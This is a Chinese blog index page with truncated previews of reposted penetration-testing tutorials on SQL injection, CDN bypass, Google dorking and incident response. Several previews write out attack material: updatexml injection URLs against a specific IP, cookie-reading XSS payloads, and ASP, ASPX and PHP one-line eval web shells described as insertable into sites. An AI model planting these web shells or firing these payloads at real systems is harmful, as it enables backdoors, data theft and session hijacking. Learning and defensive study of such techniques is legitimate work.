自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

  • 博客(16)
  • 收藏
  • 关注

转载 日志:记一次网页篡改(从开始到质保)一个渗透工作者的工作之路

1.第一次接到这个单子的时候以为很简单,网页篡改无非就是JS或者index页面出现了问题。2.去网站访问一下,发现跳转到菠菜页面,直接拿到远程登陆账号密码登陆进去,查看网站根目录。3.发现网站中有一个index 一个indax 查看源码发现 index是菠菜页面,indax是正常页面,我重新恢复一下,把index切到了桌面上。4.过几天,客户找我说又被篡改了,我发现这个问题不...

2019-08-27 09:47:00 271

转载 应急响应

项目介绍针对挖矿木马,蠕虫病毒,网站挂马,网站篡改,网站暗链,系统漏洞的一些安全事件的处置经验,思路,日志分析,溯源什么的和一些简单的逆向未来想做一些什么?Webshell查杀,对于我们做应急的人员来说其实很鸡肋,windows服务器还好说,我们可以在客户服务器上下一个D盾Web查杀对吧,D盾也挺强的,但是linux下其实没什么好的解决方案,虽然有河马linux查杀,用...

2019-08-27 09:37:00 201

转载 常见逻辑漏洞总结

kaixinyufeng博客园首页新随笔联系订阅管理Web安全测试中常见逻辑漏洞解析(实战篇)Web安全测试中常见逻辑漏洞解析(实战篇)简要:越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信...

2019-07-18 21:02:00 1288

转载 雷驰系统总结

注:本文主要总结雷池三个版本的几个漏洞并简单说下拿shell,善于总结进步才快。呵呵,本文献给和我一样的小菜,高手掠过!初学asp,有错请提出~谢谢!一、’or’=’or’漏洞1.漏洞分析漏洞文件当然在后台验证文件上,/admin/CHKLOGIN.ASP中,见代码4-7行:dim rsadmin1=request("admin") ‘没有任何过滤password1=request("p...

2019-07-17 20:37:00 534

转载 过CDN

1、ping www.xx.com如果有CDN,那么可以去掉www再试一试顶级域名可能加CDN,二级域名不一定有CDN从二级域名中找,前提要求,二级(多级)域名跟顶级域名在同一台服务器2、nslookup3、需要翻墙 site_report?url=所要查的域名4、邮箱...

2019-07-17 20:37:00 177

转载 mssql注入

①判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈②判断数据库版本 and 1=@@version--这个语句要在有回显的模式下才可以哦 an...

2019-07-17 12:22:00 176

转载 mysql手动注入

select * from tables where id=$id; #这种情况下,$id变量多为数字型 不需要闭合符号,可以直接注入,但如果系统做了只能传入数字型的判断,就无法注入select * from tables where id='$id'; #这种情况下,$id变量多为字符型 需要闭合单引号,可以用?id=1'这种形式闭合...

2019-07-17 12:21:00 149

转载 判断注入类型

1、数字型注入当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。测试步骤:(1) 加单引号,URL:www.text.com/text.php?id=3’对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;(2) 加and 1=1 ,URL:www.text.com/text.php...

2019-07-17 11:26:00 1368

转载 谷歌语法

site:url.com '查看这个站点上的信息最好不加www,可以查看到不少的二级域名信息,可以有不小的收获哈最好与inurl,intext等联用,效果更佳..=============================================================================intext:测试 '查看文本种包含"测试"的网页intitle:...

2019-07-15 13:50:00 112

转载 sqlmap

http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select database()),0x7e),1)--+http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select grou...

2019-07-15 13:50:00 94

转载 xss payload

'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...

2019-07-15 13:49:00 379

转载 手工注入步骤

sql 注入一、如果发现某一个网站可能存在sql注入(步骤)1、判断存在什么方式注入(数字、字符)(具体步骤 and 1=1 and 1=2)union 联合注入(前提是页面必须要有显示位) 判断列数:order by 1,2,3,4,5,6.......--+ 判断显示位:(前面的语句必须是错误的)union select 1,2,3 ..... --+(1)联合注入--列出...

2019-07-15 13:47:00 231

转载 实习

笔者作为网络安全的初识者,从求职者的角度总结了一点点关于渗透测试工程师求职面试的要点给即将毕业的大学生(实习生和应届生)予以参考,以便能更好更快地找到一份自己满意的工作。总结基于笔者本人的几次面试经历,都是自己投简历(广州的几家公司),没有校招。这里简单介绍一下:我自学web渗透和Android逆向半年有余,计算机网络专业的专科生,通过赛事接触web渗透,慢慢接触Android逆...

2019-07-15 11:13:00 259

转载 一句话变形

一、原理简述对于不同的语言有不同的构造方法。基本构造:最开头构造的是脚本开始的标记核心部分:获取并执行得到的内容,通常类似eval、execute等被执行内容:一般是http等协议接受的值,通常类似request、$_POST等如果我们通过客户端向服务器发送被执行内容,那么就会让服务器执行我们发送的脚本,挂马就实现了。/*asp一句话木马*/<%...

2019-07-15 09:55:00 397

转载 一句话

asp的一句话是:<%eval request ("pass")%>aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>php的一句话是:<?php @eval($_POST['pass']);?>我们可以直接将这些语句插入到网站上的...

2019-07-15 09:51:00 164

转载 JAVA_day1

今天第一天学java,做了一个新实验float start =0.99f; int i=1; while(i<=365) { start = start*0.99f; i=i+1; } System.out.println(start);}每天颓废一...

2019-03-28 19:46:00 105

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除